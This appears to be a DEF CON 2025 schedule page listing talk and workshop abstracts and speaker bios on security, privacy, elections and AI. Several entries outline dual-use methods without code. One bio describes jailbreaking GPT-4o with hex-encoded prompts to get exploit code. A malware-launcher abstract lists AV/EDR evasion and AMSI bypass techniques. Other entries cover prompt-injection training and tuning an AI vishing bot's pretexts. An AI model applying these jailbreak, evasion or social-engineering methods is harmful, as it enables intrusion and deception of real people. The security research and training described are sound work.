All day Esports arena. Challenge your friends and drop shells, green, red, and blue.
- ics Calendar file
Cybersecurity protects free speech and human rights. It plays a crucial role in resisting authoritarian regimes and protecting democratic freedoms. This talk discusses how encryption, anonymity tools, and similar technologies can help activists, journalists, and citizens evade state surveillance and censorship. Discussion highlights how digital resistance strategies can be used to counter oppression.
Note: DCGVR Talks are scheduled 1 hour slots, but the actual presentations can be as short as 30 minutes. Please arrive at the start of the hour.
SpeakerBio: Joel PantherJoel is a cybersecurity researcher, penetration tester, and educator with over 15 years' experience in system administration, security, and consulting. His PhD produced a framework for designing dynamically generated penetration testing laboratories, and his current research focuses on offensive security skills development.
- ics Calendar file
In March, former national security advisor Mike Waltz accidentally invited a journalist into his war crimes Signal group with other senior Trump officials. “We are currently clean on OPSEC,” secretary of defense Pete Hegseth posted to the group. In May, Waltz was photographed clandestinely checking his Signal messages under the table during a cabinet meeting.
Only it turns out, Waltz was actually using a knock-off of Signal called TM SGNL. Immediately after that, TeleMessage (the company that makes TM SNGL) was hacked, and the hacker was able to access plaintext Signal messages. It was then hacked again, and the second hacker exfiltrated hundreds of gigabytes of data before TeleMessage took its service offline.
This talk is about the entire Signalgate saga: the journalist getting invited to the Signal group; Trump officials lying to Congress; the history of TeleMessage, which was founded by a former Israeli spook; an analysis of the TM SGNL source code that proves the company lied about supporting end-to-end encryption; the trivial exploit that was used to extract data from TeleMessage’s archive server; and an analysis of hundreds of gigabytes of memory dumps full of chat logs from TeleMessage customers.
References:
Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.
- ics Calendar file
Machine Learning (ML) security is far older than what most people think. The first documented "vulnerability" in a ML model dates back to 2004. There are several well oiled teams that have been managing AI risk for over a decade. A new wave of “AI red teamers” who don’t know the history and the purpose are here. Some are doing brand safety work by making it harder for LLMs to say bad things. Others are doing safety assessments, like bias testing. Both of these aren’t really “red teaming” as there isn’t an adversary. The term is getting abused by many, including myself as I organized the misnamed Generative Red Team at DEFCON 31. There are new aspects to the field of ML Security, but it’s not that different. We will go over the history and how you should learn about the field to be most effective.
SpeakerBio: Sven Cattell
- ics Calendar file
What does it mean to serve your country in cyberspace? This virtual panel brings together representatives from the Cyber Talent Initiative (CTU), Blacks in Cybersecurity (BIC), and the Minority Cybersecurity Professionals Association (MCPA) to discuss pathways to national service through cybersecurity. Panelists will explore career opportunities in federal agencies, public-private partnerships, and mission-driven tech, while highlighting programs that support underrepresented talent in public service roles. Join us to learn how your cybersecurity skills can make an impact at the national level.
Speakers:Nikkia Henderson,Ebony Grey,Hugh Shepherd,William (Bill) ButlerMs. Nikkia Henderson is a Portfolio Manager in the federal government with 15+ years of experience. She's an advocate for women in cybersecurity and enjoys tea, cooking, beaches, and aquariums.
SpeakerBio: Ebony Grey
- ics Calendar file
What would it take to start a movement away from the major platforms, for people to #reclaimtech for themselves from the clutches of multi-billion dollar companies and VC backed unicorns, retrieving our data, our autonomy, and our sovereignty? We are a collection of conscientious objectors to the Big Tech ecosystems building community around peer-to-peer support and connection as we exit from these extractive ecosystems. Opting out of toxic systems, we believe, is not about digital minimalism but about opting in to stronger connections, more ethical systems, and a better future. In this talk, the Founders of Tech Reclaimers introduce our approach to bringing tech sovereignty to the masses: meeting people where they are, joining them on their journey, building confidence step by step, and fostering community in the process.
Speakers:Janet Vertesi,Andy HullJanet Vertesi (she/hers) is associate professor of sociology at Princeton University, where she is well known for her ìopt out experimentsî to evade tracking by data companies and embrace alternative tech systems, as well as for her in-depth studies of NASAís teams. An expert in the nexus between technology and society, she is a mobile Linux evangelist, teaches courses in critical technical practice and design, and sits on the advisory boards of the Data & Society Institute and the Electronic Privacy Information Center. Ask her how to make sure the Internet doesnít know that youíre pregnant.
SpeakerBio: Andy Hull, Reclaim Tech (https://www.reclaimcontrol.tech/)Andy Hull (he/him) has been abusing computers since they came with cassettes and not enough RAM. He dabbles with recreational hacking, enjoys a spot of light homelabbing, and still dreams of being a Demoscener next year. Andy believes that computers should be tools that set us free and enshrine our rights as humans, not abusive platforms that imprison and enrage us.
- ics Calendar file
Tras un año explorando los límites de la inteligencia artificial generativa, el equipo detrás de 0din, el GenAI Bug Bounty Program de Mozilla, comparte hallazgos, aprendizajes y desafíos enfrentados al detectar y reportar jailbreaks en modelos de IA. Esta charla ofrece una mirada técnica y crítica sobre cómo evolucionan los vectores de ataque en sistemas generativos, qué patrones se repiten, y cómo la comunidad puede colaborar para construir modelos más seguros y confiables.
SpeakerBio: Marco Figueroa, GenAI Bug Bounty Programs Manager @ Mozilla | 0DinMarco Figueroa is the GenAI Bug-Bounty Programs Manager at Mozilla’s 0DIN program, the industry’s first dedicated LLM bug-bounty platform. He leads the global researcher community that dissects guardrails across ChatGPT, Claude, Gemini and open-source LLMs. Marco’s research has repeatedly shown how hex-encoded and other obfuscated prompts can coerce GPT-4o into writing working exploit code, a technique covered by The Register and Bitdefender’s Hot-for-Security column. He also uncovered the extent of OpenAI’s container file system exposure, demonstrating live upload-and-execute paths inside ChatGPT’s Debian sandbox, as reported in Dark Reading.
- ics Calendar file
The path from a working demo to an AI vishing agent that can survive in the wild is littered with failed calls and bad prompts. We walked that path so you don't have to. This talk is a rapid-fire rundown of 10 lessons learned from taking a bot into production. We'll dive into: how to craft pretexts that don't collapse under pressure, the dirty secrets of managing conversational latency, and the surprising challenge of handling accents and background noise. Iíll break down the trade-offs between self-hosted models and commercial API infrastructure, their inherent limitations, and the privacy considerations to address. Learn how to tune prompts for believable improvisation and avoid the uncanny valley.
Speakers:Matt Holland,Enrico FaccioliMatt Holland is a startup co-founder and CISO who builds security solutions designed for the real world. His career has taken him from leading security for iconic brands like Unilever and the John Lewis Partnership to his current role as co-founder of vishr.ai, a venture tackling the threat of AI-driven social engineering. His approach is a product of that journey. He tackles every challenge by blending the strategic discipline of a global CISO, the commercial focus of an MBA, the relentless drive of a startup founder, and the adversarial mindset needed to counter modern threats.
SpeakerBio: Enrico FaccioliEnrico Faccioli is a London-based entrepreneur tackling AI-driven social engineering. His latest venture, vishr.ai, uses conversational AI to provide employees with realistic vishing simulations and hands-on training. Following his MSc in Finance from Warwick Business School, he moved from overseeing the tech strategy for L&G's real assets funds (£28bn AUM), into startup leadership as COO of the geospatial AI startup Gyana, before a breach of his own fuelled a pivot into solving critical security challenges.
- ics Calendar file
This series of self-guided labs will introduce even the most novice hacker to the world of embedded device firmware and software exploitation. First-come first-served, don't miss a chance try out these labs and get started with embedded device hacking.
- ics Calendar file
If you've never popped open an embedded device and tried to get a simple shell, this is the lab for you. This is a first-come first-served workshop where you can walk through the step by step instructions to finding and connecting to a debug interface on an embedded device.
- ics Calendar file
- ics Calendar file
- ics Calendar file
AND!XOR creates electronic badges filled with hacker challenges. We love doing this, especially coming up with unique ways for hackers to earn them. 5N4CK3Y is a vending machine hardware hacking project from AND!XOR. We retrofitted it into an IoT CTF based badge dispensing machine, bling and all. Find enough flags on our web hosted CTF platform, you get a 5N4CK3Y dispense code, punch it in, and a badge is vended to you! There are a variety of challenges to earn a badge as well others to continue working on the badge itself once obtained. These span from hardware hacking, reverse engineering, OSINT, network security, phreaking, wireless, and cryptography to name a few. There's a little bit of everything, so it's a perfect way to learn something at one of the many DEF CON villages and talking with people you meet, then attempt the CTF challenges to dispense a badge. Hardware hacking is our passion and we want people to learn on badges once they get them.
A computer, desire to learn, and make friends to beg, borrow, and steal from if you need a tool which you do not already own. Our challenges are multidisciplinary. While we will not give away what is required this year, tools participants have used in the past include: Computer, Ghidra, AFL, telephone, lock pick set, SDR, Flipper Zero, UART Adapter, FT2232 hardware debugger, chip clip, telephone parts, TV remote control, audio recorder, tracing paper, pencil, solder iron & solder, hot air gun, exacto knife, lighter, ice from a Malört cocktail being sipped on by Lintile, copper wire, booze, and ramen. In short, any tools required for the CTF challenges can be obtained at DEF CON.
Absolutely not, we invite maximum participation.
- ics Calendar file
The Department of Defense (DoD) has publicly embraced AI and its application in strategic war planning. What could possibly go wrong? What does “war planning” really involve, anyways? And why haven’t Skynet and our AI overlords ended the need for petty human conflicts by now? The presenters (former war planning advisors for the Secretary of Defense) discuss how war plans are really developed and how AI could improve that process. They will also talk about how the use of AI in war planning makes us vulnerable–both technologically and cognitively–in unanticipated ways. The presentation will conclude with policy ideas to get ahead of potential problems with AI-powered war planning.
Speakers:Noah K,Clark FNoah K has spent the past 15 years in the U.S. government developing national security policy. He was the Director for War Plans in the Office of the Secretary of Defense. In this role, he led the team responsible for providing civilian oversight of our national war plans and managing civilian-military dialogue across a range of issues regarding the Department’s planning for major conflicts. He has previously worked on issues involving special operations, and cyber intelligence. He currently works at a Federally Funded Research and Development Center exploring how national security and artificial intelligence create both opportunities and risks.
SpeakerBio: Clark FClark F has worked in the national security and defense policy space for the past decade. From 2020-2023, he served as an advisor to the Secretary of Defense on war plans, drafting national security strategic guidance and managing the Europe and space war plans portfolios. Clark currently works at a Federally Funded Research and Development Center, focusing on the intersection of defense strategy, emerging technology, and national security applications in the Indo-Pacific theater.
- ics Calendar file
Bloatware. We all hate it, and most of us are good at avoiding it. But some vendor tools – especially those managing critical drivers – can be useful when the Windows Update versions aren’t good enough for performance-critical computing.
What started as a routine driver update took a sharp turn when I confirmed a reboot modal… from my browser. Wait, my browser shouldn’t be able to do that!? To my disappointment (and maybe some surprise), it turned out to be arbitrary code execution – right from the browser. This kicked off a week-long deep dive, uncovering seven CVEs in seven days across several prominent vendors, all exploiting a common pattern: privileged services managing software on Windows with little regard for security.
In this talk, I’ll walk through the journey of discovery and exploitation of several vulnerabilities that lead to LPE/RCE. I'll cover everything from the initial attack surface discovery, reverse engineering and finally exploitation of several vulnerabilities. By the end, participants will probably be uninstalling similar software mid-session. While the exploitation journey is fun and impactful, this isn’t the kind of “access everywhere” anyone wants. It’s 2025 – we have everything we need to do better.
References:
SpeakerBio: Leon "leonjza" JacobsWith over two decades in IT - 15 years focused on cybersecurity - Leon is the CTO of Orange Cyberdefense’s SensePost Team. His career has taken him from a Tier 1 ISP, a private investment bank and now into full-time consulting, giving him a broad, real-world view of security challenges across industries. Today, Leon spends his time researching and hacking everything from enterprise networks to web and mobile applications. Passionate about building and innovating, he’s a regular contributor to the InfoSec community, sharing tools, insights, and lessons learned to help push the field forward.
- ics Calendar file
The most obvious, fundamental problem with Ballot Marking Devices is encoding voters’ choices in images voters cannot read and tabulating from those images. Compounding BMD problems, these systems produce at least three distinct images of voters’ selections: the choices in QR/bar code images, a printed text list purporting to show those encoded choices, and a ballot image produced by precinct scanners. These images and printed list may be subject to different possible mistakes misperceptions, or manipulation. Regulations have not kept up with vulnerabilities—but simply adding more regulations will not suffice. This presentation reviews regulations in several states, beginning with Florida, as an example to examine when and if the printed list for voter review may be counted.
SpeakerBio: Martha Mahoney, University of Miami School of LawMartha Mahoney is a Professor of Law and Dean’s Distinguished Scholar at the University of Miami School of Law. She has taught since 1990 in areas including Election Law, Law and Social Justice, Voting Rights, Criminal Law, and Property. She was a founding member of the Miami-Dade Election Reform Coalition. Her work with the Coalition and extensive research in public records helped expose flaws in DRE votings ystems, and she continues to research issues of voting and equality. She has made presentations on electronic voting issues at conferences and workshops, spoken on electronic voting problems to state and local governmental bodies, and submitted reports on voting and inequality to the Department of Justice. Her current research addresses inadequate regulation and fundamental flaws in ballot marking devices. A former labor and community organizer, Professor Mahoney received a B.A. from the University of the State of New York’s Regents External Degree Program, an M.A. in History from Tulane University, and a J.D. from Stanford Law School. She has published extensively in the fields of racial and economic inequality. She is co-author of an innovative legal casebook, Martha R. Mahoney, John O. Calmore & Stephanie M. Wildman, Social Justice: Professionals, Communities, and Law (2d ed. West 2013).
- ics Calendar file
- ics Calendar file
Have you ever wanted to, or tried to request accommodations? It isn't as easy as it should be, and sometimes people (illegally) deny you. Come join our discussion group going over everyone's (positive and negative) experiences of requesting legal accommodations, and sometimes having to fight for those accommodations.
SpeakerBio: Marie "ScorpVayne" HamiltonScorpVayne is currently in Private Security and an Entrepreneur. She is interested in leveraging AI in offensive and defensive security and what it will mean for the environmental, political, and legal landscape. In her undergrad, she did a research symposium on ‘Quantum Self-Healing Artificial Intelligence: A Framework for Dynamically Encrypted Cybersecurity Defense.’ She is entering a Masters in Cybersecurity Law & Policy right after Hacker Summer Camp. Her interests are continuing to learn about red and blue team tools and playing capture the flags to see where she is lacking.
When she was younger, ScorpVayne’s Mother had to move the computer to the Master bedroom because ScorpVayne was addicted to the internet. She was so addicted that her first physical breaching experience was when she picked the lock to her Mother’s bedroom to access the computer and get on the internet when her Mother wasn’t home. Oh, the sound: Krrrkkkrr… tik tik tik tik tik… BRREEEEeeeeEEEEEeeeeeeee…shhhhhhHHHHHHHHH…BweeeeeeeooooooooooOOOop!tch-tch-tch-tch… skkkrrrzzzzzzzZZZZ…PeeeeooooWEEEEEeeeEEooo…brrrRRRRrrrrrrrkkk-k-k…ssssssssSSSSSSSkkkkkkkTTTTTTTTt…clik-clik!… click-click!…bee-bee-bee-bee-bee… FWEEEeeeeEOOOOoooo…
She loves to hike to peaks and cuddle her precious ragdoll kitty, Sir Flerken.
- ics Calendar file
- ics Calendar file
Welcome to accessDenied, a high-stakes, hands-on tabletop experience where you're not just playing cards… you're protecting critical infrastructure. Imagine trying to secure your facilities, water, power, communication, while your so-called “allies” across the table spot every vulnerability you missed. And you? You're doing the same to them. In this game, you'll simulate cyber attacks, defend your systems, and learn how breaches ripple through networks, all through fast-paced, strategic play based on real-world incidents like the Maroochy Water hack and the Kyiv power grid attack.
🔍 Who Should Play?
🎯 What You’ll Learn
accessDenied isn't just for fun, it’s designed to educate non-cybersecurity players and create smarter conversations about digital threats to critical infrastructure. Whether you're a hacker, a healthcare nerd, or just want to try something new, this tabletop challenge belongs in your DEF CON lineup.
SpeakerBio: Jack Voltaic, RITUnited States military installations and their surrounding communities share an interest in the resiliency of cyber-critical infrastructure systems. In addition to civil-military interdependencies, a failure in one critical infrastructure sector can cause cascading effects across others. ACI launched the Jack Voltaic (JV) initiative to address gaps and build resilience. Beginning with the first exercise (JV 1.0) in 2016, these exercises addressed multi-sector cyber-critical infrastructure challenges.
Civil-military Local, community level Multi-sector Unclassified
With JV 4.0, ACI’s critical infrastructure resilience program will mature and transition. Through partnerships with other academic and policy communities, ACI seeks to foster the growth of JV-inspired practices. Multiple initiatives through 2025 will build upon the momentum and lessons of JV 1.0 - 3.0.
- ics Calendar file
Welcome to accessDenied, a high-stakes, hands-on tabletop experience where you're not just playing cards… you're protecting critical infrastructure. Imagine trying to secure your facilities, water, power, communication, while your so-called “allies” across the table spot every vulnerability you missed. And you? You're doing the same to them. In this game, you'll simulate cyber attacks, defend your systems, and learn how breaches ripple through networks, all through fast-paced, strategic play based on real-world incidents like the Maroochy Water hack and the Kyiv power grid attack.
🔍 Who Should Play?
🎯 What You’ll Learn
accessDenied isn't just for fun, it’s designed to educate non-cybersecurity players and create smarter conversations about digital threats to critical infrastructure. Whether you're a hacker, a healthcare nerd, or just want to try something new, this tabletop challenge belongs in your DEF CON lineup.
SpeakerBio: Jack Voltaic, RITUnited States military installations and their surrounding communities share an interest in the resiliency of cyber-critical infrastructure systems. In addition to civil-military interdependencies, a failure in one critical infrastructure sector can cause cascading effects across others. ACI launched the Jack Voltaic (JV) initiative to address gaps and build resilience. Beginning with the first exercise (JV 1.0) in 2016, these exercises addressed multi-sector cyber-critical infrastructure challenges.
Civil-military Local, community level Multi-sector Unclassified
With JV 4.0, ACI’s critical infrastructure resilience program will mature and transition. Through partnerships with other academic and policy communities, ACI seeks to foster the growth of JV-inspired practices. Multiple initiatives through 2025 will build upon the momentum and lessons of JV 1.0 - 3.0.
- ics Calendar file
Come explore the world of Traditional Chinese Medicine while we tap into our inner body wisdom and innate ability to heal ourselves. Take a journey through chi, the principles of yin and yang, the 5 elements theory and the energetic meridian system of the body.
We will flow through a meridian percussion exercise to wake up our meridians and learn how they flow. To finish the workshop, we will learn self-acupressure techniques and how to locate and stimulate potent acupressure points for vitality.
Workshop for all fitness levels. Join us for a daily wellness workshop to end your day, take time to recenter and restore yourself after your adventures at DEF CON.
This workshop is inclusive of all bodies. EveryBODY is Welcome here.
SpeakerBio: Megan AllenHi, I’m Megan Allen.
My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness - honoring a person's emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.
I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.
I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.
Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.
- ics Calendar file
- ics Calendar file
Adversary Simulator booth has hands-on adversary emulation plans specific to a wide variety of threat-actors and ransomware, these are meant to provide the participant/visitor with a better understanding of the Adversary tactics. This is a volunteer assisted activity where anyone, both management and technical folks can come-in and experience different categories of simulation, emulation and purple scenarios.
Adversary Simulator booth will be having a lab environment focused on recreating enterprise infrastructure, aimed at simulation and emulating various adversaries. Visitors will be able to view, simulate and control various TTPs used by adversaries. The simulator is meant to be a learning experience, irrespective of whether one is hands-on with highly sophisticated attack tactics or from the management.
- ics Calendar file
We are kicking off Adversray Village
- ics Calendar file
Adversary Village proudly presents "Adversary Wars CTF", an official contest at DEF CON, where the participants will have to pose as adversaries and replicate adversarial actions against each element of a “target” organization. Adversary Wars would have real world simulation of CTF scenarios and challenges, where the participants can perform various attacks and learn new attack vectors, TTPs, techniques, etc. To visualize the CTF environment, the contest area will feature a miniature model of the city made using interlocking-plastic-bricks. The breached components OR organization buildings will be physically marked in the city model as the CTF progresses.
- ics Calendar file
- ics Calendar file
Can prompt injections lead to complete infrastructure takeovers? Could AI applications be exploited to compromise backend services? Can data poisoning in AI copilots impact a company's stock? Can jailbreaks create false crisis alerts in security systems? This immersive, CTF-styled training in GenAI and LLM security dives into these pressing questions. Engage in realistic attack and defense scenarios focused on real-world threats, from prompt injection and remote code execution to backend compromise. Tackle hands-on challenges with actual AI applications to understand vulnerabilities and develop robust defenses. You’ll learn how to create a comprehensive security pipeline, mastering AI red and blue team strategies, building resilient defenses for LLMs, and handling incident response for AI-based threats. Additionally, implement a Responsible AI (RAI) program to enforce ethical AI standards across enterprise services, fortifying your organization’s AI security foundation.
By 2026, Gartner, Inc. predicts that over 80% of enterprises will engage with GenAI models, up from less than 5% in 2023. This rapid adoption presents a new challenge for security professionals. To bring you up to speed from intermediate to advanced level, this training provides essential GenAI and LLM security skills through an immersive CTF-styled framework. Delve into sophisticated techniques for mitigating LLM threats, engineering robust defense mechanisms, and operationalizing LLM agents, preparing them to address the complex security challenges posed by the rapid expansion of GenAI technologies. You will be provided with access to a live playground with custom built AI applications replicating real-world attack scenarios covering use-cases defined under the OWASP LLM top 10 framework and mapped with stages defined in MITRE ATLAS. This dense training will navigate you through areas like the red and blue team strategies, create robust LLM defenses, incident response in LLM attacks, implement a Responsible AI(RAI) program and enforce ethical AI standards across enterprise services, with the focus on improving the entire GenAI supply chain.
This training will also cover the completely new segment of Responsible AI(RAI), ethics and trustworthiness in GenAI services. Unlike traditional cybersecurity verticals, these unique challenges such as bias detection, managing risky behaviors, and implementing mechanisms for tracking information are going to be the key challenges for enterprise security teams.
By the end of this training, you will be able to:
Abhinav Singh is an esteemed cybersecurity leader & researcher with over a decade of experience across technology leaders, financial institutions, and as an independent trainer and consultant. Author of "Metasploit Penetration Testing Cookbook" and "Instant Wireshark Starter," his contributions span patents, open-source tools, and numerous publications. Recognized in security portals and digital platforms, Abhinav is a sought-after speaker & trainer at international conferences like Black Hat, RSA, DEFCON, BruCon and many more, where he shares his deep industry insights and innovative approaches in cybersecurity. He also leads multiple AI security groups at CSA, responsible for coming up with cutting-edge whitepapers and industry reports around safety and security of GenAI.
- ics Calendar file
Can prompt injections lead to complete infrastructure takeovers? Could AI applications be exploited to compromise backend services? Can data poisoning in AI copilots impact a company's stock? Can jailbreaks create false crisis alerts in security systems? This immersive, CTF-styled training in GenAI and LLM security dives into these pressing questions. Engage in realistic attack and defense scenarios focused on real-world threats, from prompt injection and remote code execution to backend compromise. Tackle hands-on challenges with actual AI applications to understand vulnerabilities and develop robust defenses. You’ll learn how to create a comprehensive security pipeline, mastering AI red and blue team strategies, building resilient defenses for LLMs, and handling incident response for AI-based threats. Additionally, implement a Responsible AI (RAI) program to enforce ethical AI standards across enterprise services, fortifying your organization’s AI security foundation.
By 2026, Gartner, Inc. predicts that over 80% of enterprises will engage with GenAI models, up from less than 5% in 2023. This rapid adoption presents a new challenge for security professionals. To bring you up to speed from intermediate to advanced level, this training provides essential GenAI and LLM security skills through an immersive CTF-styled framework. Delve into sophisticated techniques for mitigating LLM threats, engineering robust defense mechanisms, and operationalizing LLM agents, preparing them to address the complex security challenges posed by the rapid expansion of GenAI technologies. You will be provided with access to a live playground with custom built AI applications replicating real-world attack scenarios covering use-cases defined under the OWASP LLM top 10 framework and mapped with stages defined in MITRE ATLAS. This dense training will navigate you through areas like the red and blue team strategies, create robust LLM defenses, incident response in LLM attacks, implement a Responsible AI(RAI) program and enforce ethical AI standards across enterprise services, with the focus on improving the entire GenAI supply chain.
This training will also cover the completely new segment of Responsible AI(RAI), ethics and trustworthiness in GenAI services. Unlike traditional cybersecurity verticals, these unique challenges such as bias detection, managing risky behaviors, and implementing mechanisms for tracking information are going to be the key challenges for enterprise security teams.
By the end of this training, you will be able to:
Abhinav Singh is an esteemed cybersecurity leader & researcher with over a decade of experience across technology leaders, financial institutions, and as an independent trainer and consultant. Author of "Metasploit Penetration Testing Cookbook" and "Instant Wireshark Starter," his contributions span patents, open-source tools, and numerous publications. Recognized in security portals and digital platforms, Abhinav is a sought-after speaker & trainer at international conferences like Black Hat, RSA, DEFCON, BruCon and many more, where he shares his deep industry insights and innovative approaches in cybersecurity. He also leads multiple AI security groups at CSA, responsible for coming up with cutting-edge whitepapers and industry reports around safety and security of GenAI.
- ics Calendar file
In this presentation, we reveal how we used LLMs to discover 900 vulnerabilities in popular open-source tools that were never disclosed. How we caught and watched North Korean APT Lazarus debug a supply chain attack in real time and how we discovered the office Ripple (XRP) cryptocurrency SDK had been backdoored.
We started a multi-year long research project to identify how we could identify novel use cases for using LLM in supply chain security. The research fousces on two approaches
The presentation covers both technical details of our system and how use use out-the-box frontier models as well as taking deep dives into some of the more interesting findings.
SpeakerBio: MackenzieMackenzie is a developer advocate with a passion for DevOps and code security. As the co-founder and former CTO of a health tech startup, he learnt first-hand how critical it is to build secure applications with robust developer operations. Today as the Developer Advocate at GitGuardian, Mackenzie is able to share his passion for code security with developers and works closely with research teams to show how malicious actors discover and exploit vulnerabilities in code.
- ics Calendar file
AIMAL (Artificially Intelligent Malware Launcher) is a modular red team framework built to simulate advanced malware evasion techniques against modern AV/EDR/IDS solutions. It supports Process Herpaderping, Process Hollowing, Thread Hijacking, Process Ghosting, and many other evasion techniques as delivery mechanisms, with stealth enhancements including PPID spoofing, shellcode polymorphism, syscall mutation (Hell's Gate), and aggressive AMSI/ETW bypassing. AIMAL adapts to simulated detection responses through a feedback loop that mutates behavior on the fly, rotating techniques until the payload bypasses detection. Integration with the OpenAI API allows AIMAL to suggest the best evasion strategy based on alert context, helping simulate the decision-making process of advanced threat actors. Designed for research, red teaming, and adversarial simulation, AIMAL brings real-world stealth techniques into a clean, testable interface. Live demo will include payload staging, detection simulation, and mutation in action.
Speakers:Endrit Shaqiri,Natyra ShaqiriEndrit Shaqiri is an offensive security researcher, red team tool developer, and international karate champion currently pursuing his Master’s in Cybersecurity Engineering and Cryptography at Istanbul Technical University. He is also admitted to Boston University’s Master’s in Artificial Intelligence program, where he plans to continue his research on AI-powered malware and adaptive evasion systems. He is the creator of AIMaL — the Artificially Intelligent Malware Launcher — a modular framework designed for simulating modern malware evasion techniques against AV/EDR/IDS systems. Endrit has built a tool that bridges hands-on malware development with AI-assisted mutation logic. His passion lies in crafting adaptive malware simulation frameworks for red teamers, researchers, and students alike. This is his first appearance at DEF CON, bringing a glimpse of how tomorrow’s adversaries may automate and evolve in real-time.
SpeakerBio: Natyra ShaqiriNatyra Shaqiri is a cybersecurity student at Southern Maine Community College with a growing focus on malware analysis, system security, and ethical hacking. As co-developer of AIMAL — the Artificially Intelligent Malware Launcher — Natyra has contributed to the design and modularization of the tool’s evasion techniques, helping implement feedback-driven mutation logic and stealth strategy testing. She is passionate about adversarial security, system internals, and hands-on red team simulation frameworks. This marks her debut at DEF CON, where she brings the perspective of a rising cybersecurity engineer.
- ics Calendar file
AirBleed is a proof-of-concept hack demonstrating a hidden communication technique leveraging a little-known vulnerability in macOS's Bluetooth property list files (Bluetooth.plist). By fragmenting payloads into tiny pieces and injecting them into device caches that go unnoticed by standard security tools, this capability enables operatives to establish dead-drop channels for passing critical data — all without arousing suspicion. [1] Stealth-by-Design: Uses legitimate Bluetooth device caches to hide encrypted payloads up to 248 bytes per fragment. [2] Dual-Use Impact: Enables clandestine communication or counter-plotter operations by law enforcement and intel. [3] Live Demo: DEFCON demo will allow attendees to send their own Bluetooth plist payloads to a vulnerable MacBook Pro. [4] Implications: Offers a novel toolkit for counterintelligence to monitor — and disrupt — hidden networks and dead drops.
Speakers:Ray "CURZE$" Cervantes,Yvonne "Von Marie" CervantesRay is an offensive security engineer and counterintelligence innovator with a background in forensic psychology, turning aggressive tradecraft into powerful defense tools. He is currently researching facial behavioral analysis and creating AI-driven solutions for the legal and trial consulting fields. ChatGPT, Copilot, and Claude all predict that his work will land him in handcuffs within 5–10 years — a risk Ray embraces as proof he’s pushing the boundaries of security and innovation.
SpeakerBio: Yvonne "Von Marie" CervantesYvonne is a YouTube craft content creator and handmade crafter featured in craft magazines for her work on unique art pieces. She currently designs for four design company teams and also creates comic books with Ray. She is currently researching facial behavioral analysis through designing research ideas and strategies for improving the legal and trial consulting fields.
- ics Calendar file
Have you traveled and used in-flight internet services on airlines? Guess what…Evil Twins have been discovered in the wild on commercial airlines. This talk covers a tale of two people, the passenger in a rush to connect to in-flight services and the SOC analyst charged with the task of unraveling the truth.
This talk will introduce the many components that comprise the on-wing infrastrucutre and how they relate to the passengers as they journey through the skies. Tasked with unraveling a tip, the SOC Analyst must understand the relationships of the pieces to the pizzle, from tying together the logged events and knowing what the infrastructure is on-wing, ultimately piecing together a bigger puzzle via other telemetry provided by ads-b, satellite or more.
The key takeaways I’ll be focusing on are what an analyst should do to prepare themselves to hunt in this arena, processing that evdence to support their hypothesis and unlock the truth behind that pesky browser portal that didn’t feel right. Joine me for a talk about Evil Twins in the sky!
SpeakerBio: M0nkeyDrag0n, Organizer at Hard Hat BrigadeM0nkeydrag0n plays a blue teamer by day and a Hard Hat Bridage member in the after hours. Having spent a decade in IT support before shifting to his current role, m0nkeydrag0n has spent the last few years growing professionally as a cyber security engineer and endeavors to share tactics, approaches and stories with those looking to make that shift into security as well…or any pivot for that matter!
Lately, rediscovering R/C vehicles as allowed him to take flight, if only by FPV. But playing with RF is always fun, whether it’s trying to catch folks on WiGLE, designing cases for wardriving kits, earning his ham tech cert or just enjoying motorcycles for a long ride…and internet points!
Come wardrive with the Hard Hat Brigade!
- ics Calendar file
While the Cyber Demonstrator challenge is occurring, folks will be able to see what's happening inside the avionics on the aircraft and how their logging and reporting interacts with AI analysis systems to generate cyber alerts.
- ics Calendar file
Our team will share the key lessons, discoveries, and challenges we encountered during our AIxCC journey. We’ll walk through what worked, what didn’t, and the unexpected insights we gained along the way. Beyond reflection, we’ll highlight opportunities to improve AI-powered cybersecurity systems and explore where we believe the field could and should go next.
Speakers:Jeff Huang,Ze Sheng,Qingxiao Xu,Matthew Woodcock
- ics Calendar file
The Commodore 64 home computer, which sold at least 12.5 million units from 1982 to 1994, was widely used during a formative early decade in the subcultures of hacking, phreaking, piracy, and cybercrime. Like ancient insects trapped in amber, discovered and studied millions of years later, ephemera of hacker history has been fortuitously preserved in the file system structures of C64 floppy disks from the 1980s and 90s.
Enthusiasts and researchers have created byte-for-byte copies of disks in order to preserve games, applications, and demos of the time period. What is less obvious, however, is that users of the time tended to reuse disks, deleting old files to make space for new programs. This and other use patterns have resulted in interesting data being retained in unallocated sectors alongside the overtly-accessible programs and data. Often, this data can be recovered and includes logs of online sessions, hacker text files, and more.
In this talk, Dr. McGrew describes software and workflow he developed to perform forensic processing and full-text indexing of over 650,000 unique C64 floppy disk images from publicly-accessible online archives. He will also present interesting findings from searches and analysis that illustrate, for the modern audience, day-to-day hacker communications and tools of the past.
References:
Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.
- ics Calendar file
Students receive exposure to the law side of cryptocurrency business, including certification, regulation, government policy, and risk assessment. Regulators around the world evaluate and implement diverse regulations governing the use and applications of Blockchain reflecting varying degrees of acceptance ranging from blanket prohibition to highly facilitating frameworks. Organisations, in turn, assess the related risks and legal challenges. This workshop considers emerging trends and security essentials vital for business and financial businesses, providing a brief overview of AML and KYC and suggestions to increase security and decrease risk exposure.
